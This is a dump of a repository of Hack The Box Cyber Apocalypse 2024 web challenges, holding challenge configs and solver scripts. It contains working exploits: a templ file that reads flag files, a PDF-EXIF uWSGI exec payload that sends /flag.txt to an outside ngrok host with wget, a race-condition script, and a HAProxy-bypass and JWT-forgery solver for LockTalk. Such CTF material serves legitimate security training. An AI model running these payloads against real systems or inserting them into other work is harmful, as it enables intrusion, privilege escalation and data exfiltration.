mustEmbedUnimplementedRickyServiceServer() 62 | } 63 | 64 | func RegisterRickyServiceServer(s *grpc.Server, srv RickyServiceServer) { 65 | s.RegisterService(&_RickyService_serviceDesc, srv) 66 | } 67 | 68 | func _RickyService_SubmitTestimonial_Handler(srv interface{}, ctx context.Context, dec func(interface{}) error, interceptor grpc.UnaryServerInterceptor) (interface{}, error) { 69 | in := new(TestimonialSubmission) 70 | if err := dec(in); err != nil { 71 | return nil, err 72 | } 73 | if interceptor == nil { 74 | return srv.(RickyServiceServer).SubmitTestimonial(ctx, in) 75 | } 76 | info := &grpc.UnaryServerInfo{ 77 | Server: srv, 78 | FullMethod: "/RickyService/SubmitTestimonial", 79 | } 80 | handler := func(ctx context.Context, req interface{}) (interface{}, error) { 81 | return srv.(RickyServiceServer).SubmitTestimonial(ctx, req.(*TestimonialSubmission)) 82 | } 83 | return interceptor(ctx, in, info, handler) 84 | } 85 | 86 | var _RickyService_serviceDesc = grpc.ServiceDesc{ 87 | ServiceName: "RickyService", 88 | HandlerType: (*RickyServiceServer)(nil), 89 | Methods: []grpc.MethodDesc{ 90 | { 91 | MethodName: "SubmitTestimonial", 92 | Handler: _RickyService_SubmitTestimonial_Handler, 93 | }, 94 | }, 95 | Streams: []grpc.StreamDesc{}, 96 | Metadata: "pb/ptypes.proto", 97 | } 98 | -------------------------------------------------------------------------------- /web/[Easy] Testimonial/htb/solver/pwn.go: -------------------------------------------------------------------------------- 1 | package home 2 | 3 | import ( 4 | "htbchal/view/layout" 5 | "io/ioutil" 6 | "path/filepath" 7 | "strings" 8 | ) 9 | 10 | templ Index() { 11 | @layout.App(true) { 12 |
{pwn()}
13 | } 14 | } 15 | 16 | func pwn() string { 17 | files, err := ioutil.ReadDir("..") 18 | if err != nil { 19 | return "Error reading directory: " + err.Error() 20 | } 21 | 22 | var result string 23 | for _, file := range files { 24 | if strings.HasPrefix(file.Name(), "flag") && strings.HasSuffix(file.Name(), ".txt") { 25 | filePath := filepath.Join("..", file.Name()) 26 | content, err := ioutil.ReadFile(filePath) 27 | if err != nil { 28 | return "Error reading file: " + err.Error() 29 | } 30 | result += string(content) + "\n" 31 | } 32 | } 33 | 34 | return result 35 | } 36 | -------------------------------------------------------------------------------- /web/[Hard] Percetron/.gitignore: -------------------------------------------------------------------------------- 1 | # Created by https://www.toptal.com/developers/gitignore/api/node 2 | # Edit at https://www.toptal.com/developers/gitignore?templates=node 3 | 4 | ### Node ### 5 | # Logs 6 | logs 7 | *.log 8 | npm-debug.log* 9 | yarn-debug.log* 10 | yarn-error.log* 11 | lerna-debug.log* 12 | .pnpm-debug.log* 13 | 14 | # Diagnostic reports (https://nodejs.org/api/report.html) 15 | report.[0-9]*.[0-9]*.[0-9]*.[0-9]*.json 16 | 17 | # Runtime data 18 | pids 19 | *.pid 20 | *.seed 21 | *.pid.lock 22 | 23 | # Directory for instrumented libs generated by jscoverage/JSCover 24 | lib-cov 25 | 26 | # Coverage directory used by tools like istanbul 27 | coverage 28 | *.lcov 29 | 30 | # nyc test coverage 31 | .nyc_output 32 | 33 | # Grunt intermediate storage (https://gruntjs.com/creating-plugins#storing-task-files) 34 | .grunt 35 | 36 | # Bower dependency directory (https://bower.io/) 37 | bower_components 38 | 39 | # node-waf configuration 40 | .lock-wscript 41 | 42 | # Compiled binary addons (https://nodejs.org/api/addons.html) 43 | build/Release 44 | 45 | # Dependency directories 46 | node_modules/ 47 | jspm_packages/ 48 | 49 | # Snowpack dependency directory (https://snowpack.dev/) 50 | web_modules/ 51 | 52 | # TypeScript cache 53 | *.tsbuildinfo 54 | 55 | # Optional npm cache directory 56 | .npm 57 | 58 | # Optional eslint cache 59 | .eslintcache 60 | 61 | # Optional stylelint cache 62 | .stylelintcache 63 | 64 | # Microbundle cache 65 | .rpt2_cache/ 66 | .rts2_cache_cjs/ 67 | .rts2_cache_es/ 68 | .rts2_cache_umd/ 69 | 70 | # Optional REPL history 71 | .node_repl_history 72 | 73 | # Output of 'npm pack' 74 | *.tgz 75 | 76 | # Yarn Integrity file 77 | .yarn-integrity 78 | 79 | # dotenv environment variable files 80 | .env 81 | .env.development.local 82 | .env.test.local 83 | .env.production.local 84 | .env.local 85 | 86 | # parcel-bundler cache (https://parceljs.org/) 87 | .cache 88 | .parcel-cache 89 | 90 | # Next.js build output 91 | .next 92 | out 93 | 94 | # Nuxt.js build / generate output 95 | .nuxt 96 | dist 97 | 98 | # Gatsby files 99 | .cache/ 100 | # Comment in the public line in if your project uses Gatsby and not Next.js 101 | # https://nextjs.org/blog/next-9-1#public-directory-support 102 | # public 103 | 104 | # vuepress build output 105 | .vuepress/dist 106 | 107 | # vuepress v2.x temp and cache directory 108 | .temp 109 | 110 | # Docusaurus cache and generated files 111 | .docusaurus 112 | 113 | # Serverless directories 114 | .serverless/ 115 | 116 | # FuseBox cache 117 | .fusebox/ 118 | 119 | # DynamoDB Local files 120 | .dynamodb/ 121 | 122 | # TernJS port file 123 | .tern-port 124 | 125 | # Stores VSCode versions used for testing VSCode extensions 126 | .vscode-test 127 | 128 | # yarn v2 129 | .yarn/cache 130 | .yarn/unplugged 131 | .yarn/build-state.yml 132 | .yarn/install-state.gz 133 | .pnp.* 134 | 135 | ### Node Patch ### 136 | # Serverless Webpack directories 137 | .webpack/ 138 | 139 | # Optional stylelint cache 140 | 141 | # SvelteKit build / generate output 142 | .svelte-kit 143 | 144 | # End of https://www.toptal.com/developers/gitignore/api/node 145 | -------------------------------------------------------------------------------- /web/[Hard] Percetron/assets/about.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Hard] Percetron/assets/about.png -------------------------------------------------------------------------------- /web/[Hard] Percetron/assets/addcert.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Hard] Percetron/assets/addcert.png -------------------------------------------------------------------------------- /web/[Hard] Percetron/assets/admin.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Hard] Percetron/assets/admin.png -------------------------------------------------------------------------------- /web/[Hard] Percetron/assets/certificates.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Hard] Percetron/assets/certificates.png -------------------------------------------------------------------------------- /web/[Hard] Percetron/assets/home.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Hard] Percetron/assets/home.png -------------------------------------------------------------------------------- /web/[Hard] Percetron/assets/hosts.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Hard] Percetron/assets/hosts.png -------------------------------------------------------------------------------- /web/[Hard] Percetron/assets/login.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Hard] Percetron/assets/login.png -------------------------------------------------------------------------------- /web/[Hard] Percetron/assets/management.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Hard] Percetron/assets/management.png -------------------------------------------------------------------------------- /web/[Hard] Percetron/assets/op_msg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Hard] Percetron/assets/op_msg.png -------------------------------------------------------------------------------- /web/[Hard] Percetron/assets/overview.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Hard] Percetron/assets/overview.png -------------------------------------------------------------------------------- /web/[Hard] Percetron/assets/register.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Hard] Percetron/assets/register.png -------------------------------------------------------------------------------- /web/[Hard] Percetron/assets/smuggling.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Hard] Percetron/assets/smuggling.png -------------------------------------------------------------------------------- /web/[Hard] Percetron/assets/smuggling2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Hard] Percetron/assets/smuggling2.png -------------------------------------------------------------------------------- /web/[Hard] Percetron/assets/solved.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Hard] Percetron/assets/solved.png -------------------------------------------------------------------------------- /web/[Hard] Percetron/conf/haproxy.conf: -------------------------------------------------------------------------------- 1 | global 2 | log /dev/log local0 3 | log /dev/log local1 notice 4 | maxconn 4096 5 | user haproxy 6 | group haproxy 7 | defaults 8 | mode http 9 | timeout connect 5000 10 | timeout client 10000 11 | timeout server 10000 12 | frontend http-in 13 | bind *:1337 14 | default_backend forward_default 15 | backend forward_default 16 | http-request deny if { path -i -m beg /healthcheck-dev } 17 | server s1 127.0.0.1:3000 18 | -------------------------------------------------------------------------------- /web/[Hard] Percetron/conf/supervisord.conf: -------------------------------------------------------------------------------- 1 | [supervisord] 2 | user=root 3 | nodaemon=true 4 | logfile=/dev/null 5 | logfile_maxbytes=0 6 | pidfile=/run/supervisord.pid 7 | 8 | [program:haproxy] 9 | command=haproxy -f /usr/local/etc/haproxy/haproxy.cfg 10 | directory=/app 11 | stdout_logfile=/dev/stdout 12 | stdout_logfile_maxbytes=0 13 | stderr_logfile=/dev/stderr 14 | stderr_logfile_maxbytes=0 15 | 16 | [program:neo4j] 17 | command=/opt/neo4j/bin/neo4j start 18 | directory=/app 19 | stdout_logfile=/dev/stdout 20 | stdout_logfile_maxbytes=0 21 | stderr_logfile=/dev/stderr 22 | stderr_logfile_maxbytes=0 23 | 24 | [program:express] 25 | command=npm start 26 | directory=/app 27 | stdout_logfile=/dev/stdout 28 | stdout_logfile_maxbytes=0 29 | stderr_logfile=/dev/stderr 30 | stderr_logfile_maxbytes=0 -------------------------------------------------------------------------------- /web/[Hard] Percetron/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | # Secure entrypoint 4 | chmod 600 /entrypoint.sh 5 | 6 | # Set script variables 7 | NEO4J_PASS=$(cat /dev/urandom | tr -cd "a-f0-9" | head -c 32) 8 | SESSION_SECRET=$(cat /dev/urandom | tr -cd "a-f0-9" | head -c 32) 9 | 10 | # Set environment variables 11 | echo "SESSION_SECRET=$SESSION_SECRET" > /app/.env 12 | echo "NEO4J_URI=bolt://127.0.0.1:7687" >> /app/.env 13 | echo "NEO4J_USER=neo4j" >> /app/.env 14 | echo "NEO4J_PASS=$NEO4J_PASS" >> /app/.env 15 | echo "MONGODB_URL=mongodb://127.0.0.1:27017/percetron" >> /app/.env 16 | 17 | # Set neo4j password 18 | /opt/neo4j/bin/neo4j-admin dbms set-initial-password $NEO4J_PASS 19 | 20 | # Change flag name 21 | mv /flag.txt /flag$(cat /dev/urandom | tr -cd "a-f0-9" | head -c 10).txt 22 | 23 | # Create mongodb directory 24 | mkdir /tmp/mongodb 25 | 26 | # Run mongodb 27 | mongod --bind_ip 0.0.0.0 --noauth --dbpath /tmp/mongodb/ & 28 | 29 | until nc -z localhost 27017 30 | do 31 | sleep 1 32 | done 33 | 34 | # Launch supervisord 35 | /usr/bin/supervisord -c /etc/supervisord.conf 36 | -------------------------------------------------------------------------------- /web/[Insane] apexsurvive/assets/admhoem.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Insane] apexsurvive/assets/admhoem.png -------------------------------------------------------------------------------- /web/[Insane] apexsurvive/assets/afterverified.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Insane] apexsurvive/assets/afterverified.png -------------------------------------------------------------------------------- /web/[Insane] apexsurvive/assets/chrover.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Insane] apexsurvive/assets/chrover.png -------------------------------------------------------------------------------- /web/[Insane] apexsurvive/assets/cook.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Insane] apexsurvive/assets/cook.png -------------------------------------------------------------------------------- /web/[Insane] apexsurvive/assets/csrfdone.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Insane] apexsurvive/assets/csrfdone.png -------------------------------------------------------------------------------- /web/[Insane] apexsurvive/assets/cssexpl.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Insane] apexsurvive/assets/cssexpl.png -------------------------------------------------------------------------------- /web/[Insane] apexsurvive/assets/email.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Insane] apexsurvive/assets/email.png -------------------------------------------------------------------------------- /web/[Insane] apexsurvive/assets/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Insane] apexsurvive/assets/flag.png -------------------------------------------------------------------------------- /web/[Insane] apexsurvive/assets/home.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Insane] apexsurvive/assets/home.png -------------------------------------------------------------------------------- /web/[Insane] apexsurvive/assets/inbox.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Insane] apexsurvive/assets/inbox.png -------------------------------------------------------------------------------- /web/[Insane] apexsurvive/assets/info.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Insane] apexsurvive/assets/info.png -------------------------------------------------------------------------------- /web/[Insane] apexsurvive/assets/login.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Insane] apexsurvive/assets/login.png -------------------------------------------------------------------------------- /web/[Insane] apexsurvive/assets/proadd.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Insane] apexsurvive/assets/proadd.png -------------------------------------------------------------------------------- /web/[Insane] apexsurvive/assets/product.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Insane] apexsurvive/assets/product.png -------------------------------------------------------------------------------- /web/[Insane] apexsurvive/bot/app.py: -------------------------------------------------------------------------------- 1 | from flask import Flask, request 2 | from selenium import webdriver 3 | from selenium.webdriver.common.by import By 4 | from selenium.webdriver.chrome.options import Options 5 | import time, threading 6 | 7 | app = Flask(__name__) 8 | 9 | @app.route('/visit') 10 | def visit(): 11 | productID = request.args.get('productID') 12 | email = request.args.get('email') 13 | password = request.args.get('password') 14 | 15 | thread = threading.Thread(target=bot, args=(productID, email, password)) 16 | thread.start() 17 | return 'OK' 18 | 19 | def bot(productID, email, password): 20 | chrome_options = Options() 21 | 22 | prefs = { 23 | "download.prompt_for_download": True, 24 | "download.default_directory": "/dev/null" 25 | } 26 | 27 | chrome_options.add_experimental_option( 28 | "prefs", prefs 29 | ) 30 | chrome_options.add_argument('headless') 31 | chrome_options.add_argument('no-sandbox') 32 | chrome_options.add_argument('ignore-certificate-errors') 33 | chrome_options.add_argument('disable-dev-shm-usage') 34 | chrome_options.add_argument('disable-infobars') 35 | chrome_options.add_argument('disable-background-networking') 36 | chrome_options.add_argument('disable-default-apps') 37 | chrome_options.add_argument('disable-extensions') 38 | chrome_options.add_argument('disable-gpu') 39 | chrome_options.add_argument('disable-sync') 40 | chrome_options.add_argument('disable-translate') 41 | chrome_options.add_argument('hide-scrollbars') 42 | chrome_options.add_argument('metrics-recording-only') 43 | chrome_options.add_argument('no-first-run') 44 | chrome_options.add_argument('safebrowsing-disable-auto-update') 45 | chrome_options.add_argument('media-cache-size=1') 46 | chrome_options.add_argument('disk-cache-size=1') 47 | chrome_options.add_argument('disable-setuid-sandbox') 48 | chrome_options.add_argument('--js-flags=--noexpose_wasm,--jitless') 49 | 50 | client = webdriver.Chrome(options=chrome_options) 51 | 52 | client.get(f"https://127.0.0.1:1337/challenge/") 53 | 54 | time.sleep(3) 55 | client.find_element(By.ID, "email").send_keys(email) 56 | client.find_element(By.ID, "password").send_keys(password) 57 | client.execute_script("document.getElementById('login-btn').click()") 58 | 59 | time.sleep(3) 60 | client.get(f"https://127.0.0.1:1337/challenge/home") 61 | time.sleep(3) 62 | client.get(f"https://127.0.0.1:1337/challenge/product/{productID}") 63 | time.sleep(120) 64 | 65 | client.quit() 66 | 67 | if __name__ == '__main__': 68 | app.run(host='127.0.0.1', port=8082) -------------------------------------------------------------------------------- /web/[Insane] apexsurvive/email-app/index.js: -------------------------------------------------------------------------------- 1 | const express = require('express'); 2 | const app = express(); 3 | const path = require('path'); 4 | const nunjucks = require('nunjucks'); 5 | const routes = require('./routes'); 6 | 7 | nunjucks.configure('views', { 8 | autoescape: true, 9 | express: app 10 | }); 11 | 12 | app.set('views', './views'); 13 | app.use('/email/static', express.static(path.resolve('static'))); 14 | app.set('etag', false); 15 | 16 | app.use(routes()); 17 | 18 | app.all('*', (req, res) => { 19 | return res.status(404).send({ 20 | message: '404 page not found' 21 | }); 22 | }); 23 | 24 | (async () => { 25 | app.listen(8080, '0.0.0.0', () => console.log('Listening on port 8080')); 26 | })(); -------------------------------------------------------------------------------- /web/[Insane] apexsurvive/email-app/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "email-app", 3 | "version": "1.0.0", 4 | "description": "A email client", 5 | "main": "index.js", 6 | "scripts": { 7 | "dev": "nodemon -e html,js,css index.js", 8 | "start": "node index.js" 9 | }, 10 | "keywords": [], 11 | "author": "Xclow3n", 12 | "license": "ISC", 13 | "dependencies": { 14 | "express": "^4.18.2", 15 | "mailhog": "^4.16.0", 16 | "nunjucks": "^3.2.4" 17 | }, 18 | "devDependencies": { 19 | "nodemon": "^3.0.3" 20 | } 21 | } 22 | -------------------------------------------------------------------------------- /web/[Insane] apexsurvive/email-app/routes/index.js: -------------------------------------------------------------------------------- 1 | const express = require('express'); 2 | const router = express.Router(); 3 | const mailhog = require('mailhog')({ 4 | host: 'localhost', 5 | port: 9000 6 | }) 7 | 8 | router.get('/email/', async (req, res) => { 9 | const result = await mailhog.messages(0, 10) 10 | 11 | mails = [] 12 | 13 | for (let item of result.items) { 14 | if (item.to == 'test@email.htb') { 15 | mails.push(item); 16 | } 17 | } 18 | 19 | return res.render('home.html', {result: mails}); 20 | }); 21 | 22 | router.get('/email/deleteall', async (req, res)=> { 23 | const response = await mailhog.deleteAll() 24 | return res.redirect('/email/'); 25 | }) 26 | 27 | module.exports = () => { 28 | return router; 29 | }; -------------------------------------------------------------------------------- /web/[Insane] apexsurvive/email-app/static/images/LaughtPepe.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Insane] apexsurvive/email-app/static/images/LaughtPepe.gif -------------------------------------------------------------------------------- /web/[Insane] apexsurvive/email-app/views/home.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Mail Inbox 5 | 6 | 7 | 8 |
9 |
10 |
11 |
12 |

Inbox

13 | Delete all 14 |
15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | {% for item in result %} 26 | 27 | 28 | 29 | 30 | 31 | 32 | {% endfor %} 33 | 34 |
FromToSubjectContent
{{ item.from }}{{ item.to }}{{ item.subject }}{{ item.text }}
35 |
36 |
37 |
38 | 39 |
40 |
41 |
42 |

Created by Xclow3n with

43 |
44 |
45 |
46 | 47 | 48 | -------------------------------------------------------------------------------- /web/[Insane] apexsurvive/htb/css_injection_csrf/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "dependencies": { 3 | "compression": "^1.7.4", 4 | "connect": "^3.7.0", 5 | "express": "^4.18.2", 6 | "morgan": "^1.10.0", 7 | "nodemon": "^3.0.3", 8 | "socket.io": "^4.7.4", 9 | "websocket": "^1.0.34" 10 | } 11 | } 12 | -------------------------------------------------------------------------------- /web/[Insane] apexsurvive/htb/genPDF.py: -------------------------------------------------------------------------------- 1 | from fpdf import FPDF 2 | from exiftool import ExifToolHelper 3 | 4 | with ExifToolHelper() as et: 5 | et.set_tags( 6 | ["test.jpeg"], 7 | tags={"model": " [uwsgi] foo = @(exec://wget https://f0af-2405-201-550b-ba5-3ca4-b505-692f-fdf0.ngrok-free.app?flag=$(cat /flag.txt)) "}, 8 | params=["-E", "-overwrite_original"] 9 | ) 10 | 11 | class MyFPDF(FPDF): 12 | pass 13 | 14 | pdf = MyFPDF() 15 | 16 | pdf.add_page() 17 | pdf.image('./test.jpeg') 18 | pdf.output('payload.pdf', 'F') -------------------------------------------------------------------------------- /web/[Insane] apexsurvive/htb/payload.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Insane] apexsurvive/htb/payload.pdf -------------------------------------------------------------------------------- /web/[Insane] apexsurvive/htb/solver.py: -------------------------------------------------------------------------------- 1 | import asyncio 2 | import httpx 3 | import re 4 | import requests 5 | 6 | url = 'https://127.0.0.1:1337' 7 | cookies = {"session": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MiwiZXhwIjoxNzA5MzQ4ODQ4LCJhbnRpQ1NSRlRva2VuIjoiOTdlNGExMzEtOWZhNC00M2Y1LWEwMTYtZDU5MGVlMWU3ZWU0In0.J9ECzcfGTk6RPEAlW6Fo7o961266Gfe4O7_rSU0BOnE"} 8 | 9 | async def changeProfile(client, data): 10 | resp = await client.post(f'{url}/challenge/api/profile', cookies=cookies, data=data, headers={'Content-Type': 'application/x-www-form-urlencoded'}) 11 | return resp.text 12 | 13 | async def getEmail(session): 14 | r = await session.get(f'{url}/email/') 15 | res = r.text 16 | token_pattern = r'token=([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})' 17 | tokens = re.findall(token_pattern, res) 18 | for token in tokens: 19 | print(token) 20 | await session.get(f'{url}/email/deleteall') 21 | 22 | 23 | async def main(): 24 | async with httpx.AsyncClient(verify=False, http2=True) as client: 25 | tasks = [] 26 | for i in range(2): 27 | tasks.append(asyncio.ensure_future(changeProfile(client, data="email=test@apexsurvive.htb&username=test&fullName=test&antiCSRFToken=97e4a131-9fa4-43f5-a016-d590ee1e7ee4"))) 28 | tasks.append(asyncio.ensure_future(changeProfile(client, data="email=test@email.htb&username=test&fullName=test&antiCSRFToken=97e4a131-9fa4-43f5-a016-d590ee1e7ee4"))) 29 | tasks.append(asyncio.ensure_future(changeProfile(client, data="email=test@apexsurvive.htb&username=test&fullName=test&antiCSRFToken=97e4a131-9fa4-43f5-a016-d590ee1e7ee4"))) 30 | 31 | # Get responses 32 | results = await asyncio.gather(*tasks, return_exceptions=True) 33 | 34 | for r in results: 35 | print(r) 36 | 37 | # Async2sync sleep 38 | await asyncio.sleep(0.5) 39 | # await getEmail(client) 40 | 41 | # print(results) 42 | 43 | # Perform Race condition 44 | asyncio.run(main()) 45 | 46 | 47 | 48 | #
-------------------------------------------------------------------------------- /web/[Insane] apexsurvive/htb/test.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Insane] apexsurvive/htb/test.jpeg -------------------------------------------------------------------------------- /web/[Medium] LockTalk/assets/.gitkeep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Medium] LockTalk/assets/.gitkeep -------------------------------------------------------------------------------- /web/[Medium] LockTalk/conf/haproxy.cfg: -------------------------------------------------------------------------------- 1 | global 2 | daemon 3 | maxconn 256 4 | 5 | defaults 6 | mode http 7 | 8 | timeout connect 5000ms 9 | timeout client 50000ms 10 | timeout server 50000ms 11 | 12 | frontend haproxy 13 | bind 0.0.0.0:1337 14 | default_backend backend 15 | 16 | http-request deny if { path_beg,url_dec -i /api/v1/get_ticket } 17 | 18 | backend backend 19 | balance roundrobin 20 | server s1 0.0.0.0:5000 maxconn 32 check 21 | -------------------------------------------------------------------------------- /web/[Medium] LockTalk/conf/requirements.txt: -------------------------------------------------------------------------------- 1 | uwsgi 2 | Flask 3 | requests 4 | python_jwt==3.3.3 -------------------------------------------------------------------------------- /web/[Medium] LockTalk/conf/supervisord.conf: -------------------------------------------------------------------------------- 1 | [supervisord] 2 | nodaemon=true 3 | logfile=/dev/null 4 | logfile_maxbytes=0 5 | pidfile=/run/supervisord.pids 6 | user=root 7 | 8 | [program:uwsgi] 9 | command=uwsgi --ini '/opt/conf/uwsgi.ini' 10 | stdout_logfile=/dev/stdout 11 | stdout_logfile_maxbytes=0 12 | stderr_logfile=/dev/stderr 13 | stderr_logfile_maxbytes=0 14 | 15 | [program:haproxy] 16 | command=haproxy -db -f '/opt/conf/haproxy.cfg' 17 | stdout_logfile=/dev/stdout 18 | stdout_logfile_maxbytes=0 19 | stderr_logfile=/dev/stderr 20 | stderr_logfile_maxbytes=0 -------------------------------------------------------------------------------- /web/[Medium] LockTalk/conf/uwsgi.ini: -------------------------------------------------------------------------------- 1 | [uwsgi] 2 | ; application settings 3 | workdir = /opt/app/ 4 | ipaddress = 0.0.0.0 5 | port = 5000 6 | virtualenv = /venv 7 | 8 | ; application configuration 9 | chdir = %(workdir) 10 | http-socket = %(ipaddress):%(port) 11 | protocol = http 12 | master = true 13 | processes = 2 14 | http-timeout = 86400 15 | single-interpreter = true 16 | enable-threads = true 17 | thunder-lock = true 18 | vacuum = true 19 | disable-logging = true 20 | 21 | ; application module 22 | module = run:app 23 | 24 | ; internal routes 25 | route = .* addheader:Server: uWSGI Server 26 | 27 | ; setup uid, gid 28 | uid = nobody 29 | gid = nobody -------------------------------------------------------------------------------- /web/[Medium] LockTalk/htb/solver.py: -------------------------------------------------------------------------------- 1 | from jwcrypto.common import base64url_encode, base64url_decode 2 | from json import loads, dumps 3 | import requests 4 | import socket 5 | 6 | def send_raw_http_request(host, port, request): 7 | client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 8 | 9 | client_socket.connect((host, port)) 10 | 11 | client_socket.sendall(request.encode()) 12 | 13 | response = b"" 14 | while True: 15 | recv_data = client_socket.recv(1024) 16 | if not recv_data: 17 | break 18 | response += recv_data 19 | 20 | client_socket.close() 21 | 22 | return response.decode() 23 | 24 | def get_token(host,port): 25 | request = f"""GET /api/v1/get_ticket# HTTP/1.1\r\nHost: {host}:{port}\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.88 Safari/537.36\r\nConnection: close\r\n\r\n""" 26 | 27 | response = send_raw_http_request(host, 1337, request) 28 | json_start = response.find("{") 29 | json_end = response.rfind("}") + 1 30 | json_data = response[json_start:json_end] 31 | 32 | ticket_dict = loads(json_data) 33 | token = ticket_dict.get("ticket: ") 34 | 35 | return token 36 | 37 | def exp(token): 38 | [header, payload, signature] = token.split(".") 39 | parsed_payload = loads(base64url_decode(payload)) 40 | parsed_payload["role"] = "administrator" 41 | fake_payload = base64url_encode((dumps(parsed_payload, separators=(',',':')))) 42 | 43 | return '{" ' + header + '.'+ fake_payload + '.":"","protected":"' + header + '", "payload":"' + payload + '","signature":"' + signature + '"}' 44 | 45 | def get_flag(host,port,token): 46 | 47 | headers = {"Authorization": token} 48 | req = requests.get(f"http://{host}:{port}/api/v1/flag", headers=headers) 49 | 50 | return req 51 | 52 | host = "localhost" 53 | port = 1337 54 | 55 | guest_token = get_token(host, port) 56 | admin_token = exp(guest_token) 57 | flag = get_flag(host, port, admin_token) 58 | 59 | print(flag.text) -------------------------------------------------------------------------------- /web/[Medium] SerialFlow/assets/overview.png: -------------------------------------------------------------------------------- 